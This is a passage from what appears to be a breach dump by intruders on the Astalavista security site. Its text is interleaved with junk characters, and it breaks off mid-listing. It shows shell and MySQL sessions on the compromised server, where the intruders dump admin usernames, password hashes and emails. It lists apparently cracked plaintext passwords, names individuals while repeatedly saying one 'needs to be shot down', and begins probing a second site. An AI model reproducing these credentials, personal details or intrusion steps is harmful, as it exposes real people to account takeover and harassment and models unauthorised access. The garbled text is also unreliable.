            $comExploits[$x]['changelog'] = $date;+ x. [5 L( w! e# Y
2 Q  b- Q& s( |( }' ?) ^- W- A
        }. d+ [7 P4 o; F+ Z) I6 ?  Q
[snip]
* |7 P  d3 F: n: r# N& u    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>1 j  U* L: e6 E0 h
<rss version=”2.0″>" `- C5 y/ f3 _. f
    <channel>
) x4 M4 V% N+ M* [3 C8 y$ U        <title>ASTALAVISTA.com - Exploits</title>
) Y, [6 z7 e6 I: T        <link>http://www.astalavista.com/exploits</link>2 M; R0 J9 E1 C4 Y/ A( L. {! ?/ w
        <description>All availably Exploits.</description>
) ?& K1 S5 c0 @( O        <language>en-us</language>. G( T- r. i! B+ g2 n
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
: a) ~" n% G5 Z        <docs>http://blogs.law.harvard.edu/tech/rss</docs>* D; w+ o8 B+ T6 W; ^  ?
        <generator>Astalavista.com</generator>
5 y8 z. k% o0 V6 r% W( U* ~$ s. X        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘3 Y- p  ^3 |9 m1 l5 B+ ]
    </channel>
5 D) h  O$ p* H0 s# D) o</rss>’;! S% G9 G/ ?, e. G8 ~& \
" o3 M4 W. J. E2 Z$ S& N/ S
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
8 X3 D3 E! G* A" b6 I        unlink (FULLPATH . ‘/feed/exploits.xml’);: ]1 e- \1 D$ n/ G  l' S$ u
    }. F; M4 K  f9 J! T, |
  ]# Y9 Z* g0 O+ [  S0 O
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);# ^. m5 D7 ^, e
[snip]
8 ^. ^# Z: ?- I" [( _- k
) w) |$ F# O, k( \+ q% j8 ish-3.2$ cat exploits.sh- c% ]. O1 j$ `. _! O! v2 |" w" o2 G8 R
#!/bin/sh7 D! x2 A1 P3 ?# a: |( f

) u5 A' A* b# n###########################################################( I  k" R- \' F
#                                                         #
7 m! y- V# R4 O: v9 L# Z! q#   Title:        milw0rm exploits adder                  #
+ x/ D" a$ g' L# t  z7 }#   Description:  Add all milw0rm exploits to the         #
! `; L2 b& G- q; I* t" r2 L#                 Astalavista.com database                #( v/ U9 y, m* P$ ~  F
#                                                         #% j& p9 t$ h7 x, T
#   Company:      Astalavista Group                       #
% f+ r4 i# f9 A, z#   Author:       Paulo M. Santos                         #
& {' @; K4 F1 V4 K1 ~#   E-Mail:       链接标记paulo.santos@astalavista.ch             #
& y+ r' I- b2 f1 F+ ?6 ~' }#                                                         #
) I! l( a8 J+ Z4 [4 E###########################################################; X* a& f4 U1 J+ Y

& ]- ?1 r% W. D) U( j' [# path8 `( `" Y8 A: Q0 S( ~
this_path=/home/com/public_html/modifications/cronjobs/ f! P+ |4 a; t& ^
! h3 i" R  U8 n- [
# change directory: o+ E* M) B+ |
cd $this_path6 Y/ c7 m" t  j9 V
cd tmp/5 L5 Y) G. Q) w/ l- I# L+ k4 z$ Q: H
8 s: ^3 o  u+ N- `. i0 `3 E
# delete files
  P! S* r* e. r- [rm -rf milw0rm.tar.* &4 u7 D7 r6 E* A2 d
rm -rf milw0rm/ &2 B' a9 _- o3 c( s9 B8 K4 {; N/ m

% o5 e  o& H  w! ^( d2 l: j# wget milw0rm paket7 {$ E9 @% I, R) U# \! K. O& C
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]8 Y- _7 j% B+ x: j4 I3 Z
! A! f0 u9 R5 o* I5 M
# extract milw0rm paket2 G8 k: r: E5 j
tar -xvf milw0rm.tar.bz20 s4 U& ]# T2 F! ^# @7 V
0 ^; L$ s, \6 l/ v) u
# change owner
" u& O2 K& I* L) r2 g2 d' h  xchown -R com .
# {8 W) i4 Y( g" @chgrp -R com .
. ~. g& `# ~! S$ r7 u% P7 }
. Y) v* x& c1 K) `$ X# execute php script4 C( Y1 x' }3 u
cd $this_path
; ~' y1 c, E3 L. p" Z% X* Kphp -q exploits.php
. x+ C" q  o3 {# ^, U; Y# B* T9 L+ v
& g+ p5 ]$ Q) O' T# delete files5 F; ^0 r8 [1 Y3 |! m
rm -rf tmp/milw0rm.tar.*
: @- f$ O# R0 Z; p9 e+ Jrm -rf tmp/milw0rm/3 a- m- {7 {' r
# W8 Q+ a- P8 o" C- A" R
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
' R" M+ s# P; A) F! u# f8 qPaulo M. Santos needs to be shot down.
+ E& y, s: Z) s: W( p! ?; Y0 K
) K$ m5 ?+ q) w1 @mysql -u contrexxuser2 -p
! a( M( V  u$ i- K7 J( UEnter password:
5 a7 L- t% ^% N# O: f2 WWelcome to the MySQL monitor.  Commands end with ; or \g.9 w0 D7 s. M2 [
Your MySQL connection id is 261694: n. p  B! l. Z6 \& |1 f9 }
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( [: p* Y, K9 S7 i, t6 v, C& M& @$ {
3 |" S' \3 B2 Q- [
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' F" M! C0 z' e
, |% O0 ^& @' z0 M4 [6 p! |mysql> show databases;3 o; l+ i" ~+ s. Q4 Y
+——————–+
$ G! C9 \5 J! x- _$ r, m! _. X5 n/ E0 k| Database           |
0 _; T% f' M/ |+——————–+
' n7 {" C* X; X$ \" N% w; D| information_schema |! i1 P8 @' m3 E2 x1 w
| com_contrexx2      |, o6 A5 ^; |' ?$ c1 Y, m
| com_contrexx2_live |4 G) d0 Z0 V0 g9 f( E4 n9 |- n
| test               |+ r0 c* A6 c7 l( y( {
+——————–+' G8 c' w! P  I' T) X" P
4 rows in set (0.00 sec)
/ z( [- R' E4 C6 Z, @! X! I, Y$ m) g1 P) j% Y) B
mysql> use com_contrexx2_live! t0 o6 }, \& Y% v9 K
Database changed5 }8 s- |3 y; @, L, h  y2 W( A+ n
mysql> show tables;
! Z5 c# v6 i6 d* x" ^+————————————————–+
4 I5 b4 h& [1 v, H9 f8 M( `| Tables_in_com_contrexx2_live                     |
3 A/ p+ V6 F9 Y( t/ ]0 q5 W+————————————————–+
7 K( J* n# ~. m# X' d| cc_banner_counter                                |* }, }4 v7 E. p! L- y
| cc_search_counter                                |
' Y& Y) j) h( Q| contrexx_access_group_dynamic_ids                |' x+ h* N8 G" K
| contrexx_access_group_static_ids                 |3 m! m7 ~; e. M! V
| contrexx_access_rel_user_group                   |$ j& U  I  P7 l0 G0 h4 J" g
| contrexx_access_settings                         |
1 g! ]5 ^; a* F. h$ J| contrexx_access_user_attribute                   |
# c1 S- T- O3 ^# K  A* t| contrexx_access_user_attribute_name              |
* w* f% G5 ?, ^6 i' f6 g| contrexx_access_user_attribute_value             |6 ~& k% R, }1 @" X9 |
| contrexx_access_user_core_attribute              |
  G5 G8 p# I2 G* S- I1 ~$ G| contrexx_access_user_groups                      |$ q4 c- ?  Q1 I3 I* G' C5 w
| contrexx_access_user_mail                        |
9 Y+ m  M- Z$ Y1 f# L| contrexx_access_user_profile                     |
+ P$ m! c+ F' a- b3 Y| contrexx_access_user_title                       |
* w0 F6 [4 T0 S; d8 c% N8 q| contrexx_access_user_validity                    |, X. L1 c9 m  W9 T" r  H8 Q4 U
| contrexx_access_users                            |/ u' `* W5 O3 G# U9 W1 ~, ^
| contrexx_backend_areas                           |2 C) A. p5 ]8 N; S/ r& L$ x. v
| contrexx_backups                                 |
& `; E4 b& r% U  X* R5 Q6 q& x| contrexx_content                                 |
( T/ B: r! y3 I4 z| contrexx_content_history                         |  X9 ?' K7 A/ }' z/ o- m- \
| contrexx_content_logfile                         |% _+ h/ B( k* C8 K2 k
| contrexx_content_navigation                      |) N! g# [) l, ]/ J6 [
| contrexx_content_navigation_history              |
3 Q) q! q3 h5 x" O/ o| contrexx_ids                                     |
6 k6 r# N& Q* n& w| contrexx_languages                               |
- {  ~; z, v8 z; v| contrexx_lib_country                             |- z) \6 ^, |: ?) X
| contrexx_log                                     |
4 B- d& k' [$ D" Z: e$ h4 U2 H| contrexx_module_alias_source                     |7 K' F+ K, p% N
| contrexx_module_alias_target                     |3 F9 V/ K5 o, f" N3 ?. x8 V
| contrexx_module_block_blocks                     |
0 M  r4 N% f' \4 z" Q9 W7 L* M1 `| contrexx_module_block_rel_lang                   |/ t: k2 d/ x& q4 h/ a" _5 \+ Q
| contrexx_module_block_rel_pages                  |
! c0 T- w& f- H0 ~| contrexx_module_block_settings                   |# f( E/ n, f) W3 P9 O! q  s9 K- E
| contrexx_module_blog_categories                  |% J+ t0 ]3 D' E3 V8 i
| contrexx_module_blog_comments                    |1 \# {: G  c1 s$ F! ^
| contrexx_module_blog_message_to_category         |
9 \$ ^+ V+ o' h2 t# S| contrexx_module_blog_messages                    |
" [( B* F# v: ?- D| contrexx_module_blog_messages_lang               |0 p9 \. R1 }) A8 j3 m" @
| contrexx_module_blog_networks                    |
& @! F- e! u/ y/ p+ f| contrexx_module_blog_networks_lang               |/ v7 }0 U" |  a- O0 j6 N
| contrexx_module_blog_settings                    |  }3 Z' Y$ s; \; Q& a  }
| contrexx_module_blog_votes                       |( q& ~: e8 ~6 W% @( B- I) u
| contrexx_module_calendar                         |
: e  a) c9 x0 t: J: D| contrexx_module_calendar_access                  |
  t" `0 M% `  U0 ]+ p6 k| contrexx_module_calendar_categories              |; W( |. @% p8 [- r% B' w8 ^: G
| contrexx_module_calendar_form_data               |, w$ Z: Y, B% L; T: y
| contrexx_module_calendar_form_fields             |! g( I7 q) p! I8 h
| contrexx_module_calendar_registrations           |
& r5 J& c8 N8 Z2 c" E4 ~| contrexx_module_calendar_settings                |
; m& w% z. \% A7 F| contrexx_module_calendar_style                   |
$ \- b: h6 S* j  L2 {4 E| contrexx_module_contact_form                     |
& ]9 e0 L1 [6 I, {, || contrexx_module_contact_form_data                |
$ w) B" ~8 }' e$ o  l' w3 h| contrexx_module_contact_form_field               |# K% d$ E0 v" K% N; d
| contrexx_module_contact_settings                 |
- o' t% S4 ]% j! h| contrexx_module_data_categories                  |
3 C( K5 X1 f6 r, m6 x! p| contrexx_module_data_message_to_category         |4 N3 R0 p# @9 p2 O- }
| contrexx_module_data_messages                    |
- u6 R: @) r( o" c/ [# m0 |* k| contrexx_module_data_messages_lang               |
4 T8 X1 s# o- O7 S| contrexx_module_data_placeholders                |
, u. j5 h, Z# U. W) x| contrexx_module_data_settings                    |
, {+ m( z; Z6 r8 p* K1 k0 l| contrexx_module_directory_access                 |6 C0 y( h3 e5 D) P+ h4 {4 |/ V# c
| contrexx_module_directory_categories             |
+ a# H6 x: u" o* A7 u/ {| contrexx_module_directory_dir                    |$ D+ O& y! C/ H$ k! ]. m
| contrexx_module_directory_inputfields            |
6 G. w7 p2 O; b. g; ]/ f| contrexx_module_directory_levels                 |
, s1 o3 Q2 O% |1 L( i* t# || contrexx_module_directory_mail                   |1 C; i: s5 N) E0 d% a$ Z7 i; U
| contrexx_module_directory_rel_dir_cat            |
  h0 L$ V, P4 |: v/ [0 K$ L| contrexx_module_directory_rel_dir_level          |
% e9 F) K$ H* Y, I8 f| contrexx_module_directory_settings               |
, y( ]0 S) C6 t( t  z: s$ a| contrexx_module_directory_settings_google        |
( j; M: }4 O; h: ~3 N| contrexx_module_directory_vote                   |& W+ g* s/ d# }2 R, Q9 o
| contrexx_module_docsys                           |
: B& S0 z  D1 L2 V$ P| contrexx_module_docsys_categories                |
9 V8 n0 x% B/ b5 T| contrexx_module_egov_configuration               |
: E2 A4 o2 n5 R- O| contrexx_module_egov_orders                      |
$ e5 ]0 F! |' `| contrexx_module_egov_product_calendar            |
: b6 z0 H: B( f% g( D" d- v9 `| contrexx_module_egov_product_fields              |8 a% l- l2 O' ~5 c
| contrexx_module_egov_products                    |1 K+ L/ o. `; g* c. P
| contrexx_module_egov_settings                    |
! t! u% W8 M8 g( X  L| contrexx_module_exploits                         |( W6 e% {4 e# m& }8 w
| contrexx_module_exploits_categories              |
; u4 Y3 k# _1 L; ]( c| contrexx_module_feed_category                    |
% D1 O5 h5 u9 Y# D; l4 ?  [| contrexx_module_feed_news                        |
' L! ]. s2 y; X. C  E, B| contrexx_module_feed_newsml_association          |3 `, M5 |  S1 H- a
| contrexx_module_feed_newsml_categories           |/ `. k) O! r" r0 _* [
| contrexx_module_feed_newsml_documents            |7 K" b1 R9 x% k7 s
| contrexx_module_feed_newsml_providers            |
% _0 u2 H& W' ~' s  e3 l| contrexx_module_forum_access                     |" a/ s! G- X) |
| contrexx_module_forum_categories                 |
  @; v$ I0 x, [% s| contrexx_module_forum_categories_lang            |; F* a+ ]! ~. F! Z) Q
| contrexx_module_forum_notification               |% N2 w- v" \+ ^  [- E
| contrexx_module_forum_postings                   |% U& G6 k/ t! f9 D0 E
| contrexx_module_forum_rating                     |
( |/ }6 \/ N/ L| contrexx_module_forum_settings                   |
9 H* {8 S9 v) }7 B| contrexx_module_forum_statistics                 |8 t3 D8 d+ u  j7 ~
| contrexx_module_gallery_categories               |% |( T" f% s9 N8 s
| contrexx_module_gallery_comments                 |
8 z' L. b! M% U* K| contrexx_module_gallery_language                 |
; j+ U1 V+ }4 ?& z) X; D3 g| contrexx_module_gallery_language_pics            |- _* C5 {$ q) @' {  g
| contrexx_module_gallery_pictures                 |9 \& G- Y9 o# c% Y/ |* k: b7 b
| contrexx_module_gallery_settings                 |
* Q1 _7 g" ~$ e  s, N' s) ?| contrexx_module_gallery_votes                    |: g( a" P; ~# R- M) U
| contrexx_module_guestbook                        |
3 ^- y6 e7 M% Y9 l( ^' d6 Y| contrexx_module_guestbook_settings               |
  j% X7 J* a2 g1 F$ X; \| contrexx_module_livecam                          |" `3 e7 I/ N. v3 S' u+ F
| contrexx_module_livecam_settings                 |
) x* F: y0 y4 x2 E- l7 }| contrexx_module_market                           |
- l& r; k- s. \8 p3 O9 T  e| contrexx_module_market_access                    |
2 c1 P/ }, m& z4 X2 B2 e( x| contrexx_module_market_categories                |% f' a9 I- t* c) U  H; F5 Q; y, A5 p
| contrexx_module_market_mail                      |
) |4 @$ u% Y& C% H/ r: T5 Q( d| contrexx_module_market_paypal                    |
; B) ]5 p3 x/ b' k- Q7 v$ g| contrexx_module_market_settings                  |& Y* |; C! J) e3 r
| contrexx_module_market_spez_fields               |
8 V, k& o9 h* |' \| contrexx_module_mediadir_access                  |$ Y9 N, B- @* D5 l* H
| contrexx_module_mediadir_categories              |
# g0 U- w2 E$ b+ w2 W/ H$ Q6 N| contrexx_module_mediadir_comments                |
; ~# Q1 J0 L2 {% A9 S) s| contrexx_module_mediadir_dir                     |
5 }* D; d$ P( ~! \* |, H| contrexx_module_mediadir_inputfields             |* q3 q& w' D$ @# z
| contrexx_module_mediadir_levels                  |" F' l- {$ G; `" f1 J
| contrexx_module_mediadir_mail                    |
6 b- i8 N" g: O( J| contrexx_module_mediadir_rel_dir_cat             |7 B" x% C6 W; @$ f! r# F
| contrexx_module_mediadir_rel_dir_level           |0 n: h8 x# t2 b$ ^
| contrexx_module_mediadir_reports                 |
9 A- E4 ]0 z6 g; F- n| contrexx_module_mediadir_settings                |
7 T! V) D' S2 p; U| contrexx_module_mediadir_settings_google         |3 c4 Y4 \* v6 U' I; `
| contrexx_module_mediadir_vote                    |/ Z+ B* d5 `% o9 z$ f! A
| contrexx_module_memberdir_directories            |
0 k& z& l( i& A+ r8 ^" h; M. o; G0 J| contrexx_module_memberdir_name                   |9 K1 I* i/ W  }& {; W$ w, m' A
| contrexx_module_memberdir_settings               |8 z2 @+ Z9 n4 `! z( s& M- g$ G
| contrexx_module_memberdir_values                 |
+ o7 W# D3 y5 ^/ V. v% d| contrexx_module_nettools_allowed_groups          |
0 j  A- J) ^/ X9 E| contrexx_module_nettools_settings                |' ^+ T1 F" P5 N  a2 y& f
| contrexx_module_news                             |
: t- a$ L" V; W7 B| contrexx_module_news_access                      |
. m6 t& u' D; d' ?8 X| contrexx_module_news_categories                  |* M7 Z* O9 U, Y& q- q( _  r' U* `4 {
| contrexx_module_news_settings                    |, J- ?( f6 B3 K6 h, n& ^. u  Z
| contrexx_module_news_teaser_frame                |4 a8 ~0 t) t9 Z5 O5 e4 K
| contrexx_module_news_teaser_frame_templates      |
' _8 K+ S, V( b$ V2 @, r% T$ o! j* n| contrexx_module_news_ticker                      |
' ^2 C4 q7 P+ a* X# l. }- B  K| contrexx_module_newsletter                       |: [' Y, x, J' ^5 X2 ?
| contrexx_module_newsletter_attachment            |$ y. l4 _- H/ s1 i2 y, x: a7 n
| contrexx_module_newsletter_category              |
, x; Z% n$ Y  p, M) k/ v# V| contrexx_module_newsletter_confirm_mail          |
; \( |6 Z! e" ~( g0 w( A  w' V/ _| contrexx_module_newsletter_rel_cat_news          |
4 S( [; B8 n: T" t: @/ T. N$ |( j| contrexx_module_newsletter_rel_user_cat          |$ I( M2 V2 T9 Y$ v. c/ H
| contrexx_module_newsletter_settings              |
3 @5 L5 |* C; J( ~| contrexx_module_newsletter_template              |
% E9 s9 U1 m1 [6 o& e( v0 u4 r| contrexx_module_newsletter_tmp_sending           |0 z! f4 i. q) S3 c. S
| contrexx_module_newsletter_user                  |
$ O- t( m* M5 |0 |; d: n% T| contrexx_module_newsletter_user_title            |
! U$ ?# r7 I  u0 h| contrexx_module_onlinetools_defaultports         |3 r  P0 ]/ k) _1 w" J) D/ r+ Z
| contrexx_module_onlinetools_defaultports_back    |
9 r! w- y, l7 L& v. u! X, A| contrexx_module_onlinetools_geolitecity_blocks   |
% g( e# V' @; c3 [1 S; E# A/ |! v- n| contrexx_module_onlinetools_geolitecity_country  |
# }2 j. Z" k5 A% n| contrexx_module_onlinetools_geolitecity_location |
' O) o) h( G; o! B- p| contrexx_module_podcast_category                 |5 i$ D6 {- ^2 X) e
| contrexx_module_podcast_medium                   |
7 z: K: A6 P3 G: h% f* c| contrexx_module_podcast_rel_category_lang        |
3 k8 V$ d# t0 ^! N- }| contrexx_module_podcast_rel_medium_category      |
8 F* \( t4 z9 u& X| contrexx_module_podcast_settings                 |
8 h+ L6 t+ O; C1 L| contrexx_module_podcast_template                 |
" X: ^) C/ d; A6 o) h| contrexx_module_proxydb                          |4 V3 i2 e' H# S; e2 v5 r
| contrexx_module_recommend                        |
, g- D7 G. Z3 W% k" n, C# }4 q( M8 m| contrexx_module_repository                       |
0 C9 b) N, U; Z- u| contrexx_module_securitynews_cats                |
$ p2 b& p% s. O# V* G* ^1 M| contrexx_module_securitynews_feeds               |
# R8 f" ~3 e; d/ R4 G| contrexx_module_securitynews_news                |7 ?- F; P8 z& x" t. k
| contrexx_module_shop_categories                  |# L) j, E. R% @7 P! |
| contrexx_module_shop_config                      |
/ F& ^$ E, f% q7 d9 p| contrexx_module_shop_countries                   |1 Y4 p( U3 p- j# e  l8 X8 ]
| contrexx_module_shop_currencies                  |; g, V  |: K$ x
| contrexx_module_shop_customers                   |
* K6 k. r8 A2 I' b; e  || contrexx_module_shop_importimg                   |
; L$ @/ ~( Q9 \/ S| contrexx_module_shop_lsv                         |
* ?9 x  u3 s5 M, p8 c| contrexx_module_shop_mail                        |
: ^1 g" D2 R, \! b7 x$ x. A3 H' B8 M- _| contrexx_module_shop_mail_content                |' Y& w8 m+ s4 ?, j9 t( L
| contrexx_module_shop_manufacturer                |" ?. ?$ o0 I; x+ @
| contrexx_module_shop_order_items                 |) f0 R! Q. }, ?# x+ |. }
| contrexx_module_shop_order_items_attributes      |3 S6 g, ~* n) x6 o; m; u: d
| contrexx_module_shop_orders                      |. c" \! ]2 V( s  u7 Z7 X
| contrexx_module_shop_payment                     |
# Q* ]9 T0 q4 @( Q| contrexx_module_shop_payment_processors          |1 i3 W: B9 d8 M' q) v9 M8 O
| contrexx_module_shop_pricelists                  |
/ _: I. G* u2 `: ?- X| contrexx_module_shop_products                    |, U% {( w- v/ J$ J2 S
| contrexx_module_shop_products_attributes         |$ a. O: {. S9 n3 s2 q) ]; S
| contrexx_module_shop_products_attributes_name    |
) v' G) F( e9 v' m- }/ l. p- K| contrexx_module_shop_products_attributes_value   |. C# J0 U) S* {) u# L! b0 e
| contrexx_module_shop_products_downloads          |5 y6 ]' W  P- v* L4 y$ r0 n) A# j  U
| contrexx_module_shop_rel_countries               |
5 l3 g+ z) u* T7 D6 P| contrexx_module_shop_rel_payment                 |
- @0 r3 o+ K; v' p& \. E, I& S- d2 y| contrexx_module_shop_rel_shipment                |# j1 b6 W3 r9 M) }+ ]0 L) `
| contrexx_module_shop_shipment_cost               |
( [9 O$ _) }, w" d/ ?5 ^| contrexx_module_shop_shipper                     |. F& w6 Y& ~3 y, w4 |; j
| contrexx_module_shop_vat                         |9 x- N, C& H' w* Y! e
| contrexx_module_shop_zones                       |* y  ]  O- D+ L) `
| contrexx_module_u2u_address_list                 |
3 s& V1 R' |  M/ ?- L; \6 Y| contrexx_module_u2u_message_log                  |
2 m: i, f$ ^9 X& d; ?+ I9 c- ?  S| contrexx_module_u2u_sent_messages                |
. [8 [$ F* {" p1 ]( W| contrexx_module_u2u_settings                     |
6 r+ M/ r) o. a5 {% T! @* C; C( ^| contrexx_module_u2u_user_log                     |" L# y: a$ b9 i+ Y$ F- V+ D3 a- H( l
| contrexx_modules                                 |
+ n+ V" |$ Y! t& Q' m' F| contrexx_sessions                                |
  z& j% l0 y" M4 x| contrexx_settings                                |+ b, X- ]) d6 l$ D
| contrexx_settings_smtp                           |, B2 n2 K3 L3 `2 F" G
| contrexx_skins                                   |
4 b6 V6 J  A9 k| contrexx_stats_browser                           |* Y, {! t- @# A9 C4 G# B+ x& T
| contrexx_stats_colourdepth                       |
9 T5 A+ n4 o: N4 l$ k9 \; _| contrexx_stats_config                            |% ]4 d2 d+ I3 ?5 B
| contrexx_stats_country                           |; B8 Y, M: O. X: n& F
| contrexx_stats_hostname                          |
0 C' Y2 }' I; A# _, u6 V| contrexx_stats_javascript                        |: F2 W! l- f: B, c! N% d
| contrexx_stats_operatingsystem                   |- k$ D% e8 R) R: a% M2 e$ E% I
| contrexx_stats_referer                           |
. m$ Q* b9 t! I: l( r. k| contrexx_stats_requests                          |
0 }& [: z$ l5 u. |) W| contrexx_stats_requests_summary                  |- P% e4 I- ]# k; G( Z
| contrexx_stats_screenresolution                  |4 B& n5 ^1 I- Y6 j' y
| contrexx_stats_search                            |! W3 P; S/ N9 Y
| contrexx_stats_spiders                           |! B9 s! k* t; \! y8 q
| contrexx_stats_spiders_summary                   |. f8 V, z$ K; f. J7 a+ i+ \2 G
| contrexx_stats_visitors                          |# g+ Y( d$ }: N0 F# ^
| contrexx_stats_visitors_summary                  |% ?6 }& B) h' o& p1 M, K
| contrexx_voting_additionaldata                   |, D6 u; D$ j4 P: _- ]
| contrexx_voting_email                            |
' ~5 V  I3 K' A/ O: G| contrexx_voting_rel_email_system                 |2 u; L' W5 i1 o1 z  w
| contrexx_voting_results                          |$ v0 S$ G# F: C1 o3 s! B1 d7 d5 S% t0 l  ]
| contrexx_voting_system                           |9 @8 z2 ^( S$ O) }. O# e
| foo                                              |, D9 I! v$ c' {7 a
+————————————————–+! G! U3 ~) q" s1 ]5 I' m; w% B
227 rows in set (0.01 sec)" u5 j. C  O2 u& h
2 F( S4 k5 i8 @- T; _( c, ^; H
mysql> select count(*) as skids from contrexx_access_users;
, U# m4 w: e& J+——-+' c9 l; ?, H" H$ ?9 c% o
| skids |% i; \, F: F$ }- G2 N% {
+——-+' h, K. b/ Z3 ^3 z9 P
| 53699 |
! X$ `+ R; I; d2 E+ l+——-+- E- B7 e- h7 t, H
1 row in set (0.00 sec)
: a9 R1 \  |8 I0 _" N. O
% T' {$ w5 u" ?# Amysql> describe contrexx_access_users;8 q6 e' Y6 {; n; [7 [" P' {
+——————+——————————————+——+—–+————–+—————-+7 |7 s8 O; v! G3 Z
| Field            | Type                                     | Null | Key | Default      | Extra          |
3 h8 q! ~6 r" o+ ~+——————+——————————————+——+—–+————–+—————-+  S8 @3 F8 f, ^' t; _0 v
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |+ J! P" S( `# x, m* M
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
1 Z1 ^4 J( D, s  k( w| username         | varchar(40)                              | YES  | MUL | NULL         |                |; P. H& H' _: T5 |  J: l
| password         | varchar(32)                              | YES  |     | NULL         |                |: i5 q  V8 s1 a" o8 \' ^) b2 F7 j, Y
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |- K7 S; `0 l: R  F7 C# j4 s
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |3 L8 ?) {2 n5 Q3 l" S9 o
| validity         | int(10) unsigned                         | NO   |     | 0            |                |5 o% s; H% e' x8 b/ u/ j$ a
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
3 _3 @5 l4 G8 b- p( f# @7 _7 P| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
, z0 D& A% r2 || email            | varchar(255)                             | YES  |     | NULL         |                |2 c; ~7 h' p( j  \0 p' o
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |& U+ i) X! ^7 E4 K9 X
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
& a& `7 F# U0 E- t1 m5 a5 l0 G7 E  u| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
7 f2 b, K2 i1 c2 v: p9 v$ e2 {/ ]| active           | tinyint(1)                               | NO   |     | 0            |                |# @5 H& x2 ^5 N: ?# I7 S. y$ V
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
! J. \) d' K5 L. X, l/ z7 a| restore_key      | varchar(32)                              | NO   |     |              |                |" [2 d; @, A8 t: e  e1 P
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
/ [$ l7 p7 b% g. n8 I. \0 k| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
+ N4 C6 g! Y5 }' \+ Z; y; W( k+——————+——————————————+——+—–+————–+—————-+
3 u. |7 z  E6 C9 _! K, T, |; {1 \18 rows in set (0.00 sec)% S- e* {# q4 v2 I* M" A

% \/ K9 _! l5 N' Z2 tmysql> select username,password,email from contrexx_access_users where is_admin = 1;9 Z, j: C* q- `, H6 h- j
+————+———————————-+—————————–+
9 R% C  C9 X; k. _: \- W( m| username   | password                         | email                       |
' \& S7 t" u' b+————+———————————-+—————————–+
- F9 w3 K; M  `6 C* @6 A% F6 Q| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |8 h4 H6 @& K8 g& t8 k* W
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |$ V( D! i( Y( Q# }  q$ P& R
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
; `2 w# b- H* q0 v* D| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |1 w( v* f, D+ {/ l
+————+———————————-+—————————–+
0 \; `" x+ R% B& s* j! p! D4 rows in set (0.04 sec)
: C' `( O7 s0 ]7 ^& r5 f) Z& C2 h2 d0 V# g
mysql> exit;
  N" n! a+ V" X' K' vBye- ~' [/ m8 N4 q( M1 h5 i$ N

* q4 u2 F7 Y. y( c' x  q[~] There you go, your “team of security and IT professionals” is a joke.
1 {- @4 R8 d7 b
: R5 V7 I0 Q* k; [+——————————+* H+ L" b, r, s7 I7 z- X! d
system:f82BN3+_*! v5 Z3 c- V* z
Be1er0ph0r:belerophor4astacom
0 }. d$ M2 E2 i) R8 N" Cprozac:asta4cms!
& Y, Y( J1 b0 c! u: vcommander:mpbdaagf6m' Y! q, ~0 O9 Y
sykadul:ak29eral/ r+ X. g; `% z* e' p) o7 [8 C* G
+——————————+
; {2 h: p/ p% A0 n: g+ l& B
5 Q- c4 j1 h: K0 l4 V[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s). a; q1 _1 H! X- |7 H6 {
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
3 i) I2 x1 w% M& ]
1 l& q' c- n5 |# |$ B[~] Lets move to astalavista.net now,
- j' L7 a. J7 ^: h* ]( m
3 [4 J6 T- b- Z, {7 _) S; R. T* d+ BFrom <链接标记[url]https://www.astalavista.net/[/url]>:, ^! M, X' M1 R; `& {2 \; m
>> Everyone knows that the best defense is a good offense.0 ?% c5 U; R- g
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.8 U% P# w# I0 F! K( H1 k
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
  m* s: e$ t8 k! W" G>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”( I+ o0 T5 p9 c& {1 w! |' J
/ P) Y* ~+ D, Z2 H) _9 O, B; i
>> Go ahead, try and hack our server . in a completely legal way!
1 Q. I- `- l2 p( c* f* [( R>> Learn by doing: We offer our members tricky tasks and challenges on an( X1 z. _' N  p) J
>> ongoing basis so you can test your knowledge and abilities. You can also5 [4 b5 a3 @0 h( O( l! k& b/ F
>> demonstrate what you.ve mastered by taking part in regular hacker contests
! m; ^  E* _- P" k>> and war games
' x2 N6 L+ j' b) e& ]- E) m' e7 H( Z9 l+ |. u' K
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!. t: h: W0 H1 g% Y" K9 i
$ f2 j. b! z2 X: F7 s2 X7 o/ |
[-] Tricky task: Find home dir of astalavista.net
6 ?8 K. ~% O0 ~
2 Q) }" s; B6 i4 ]sh-3.2$ ls -la ~astanet
5 V/ Z& D/ w9 E# I4 wtotal 48" v3 y% \. ^% E0 \% A+ Q
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
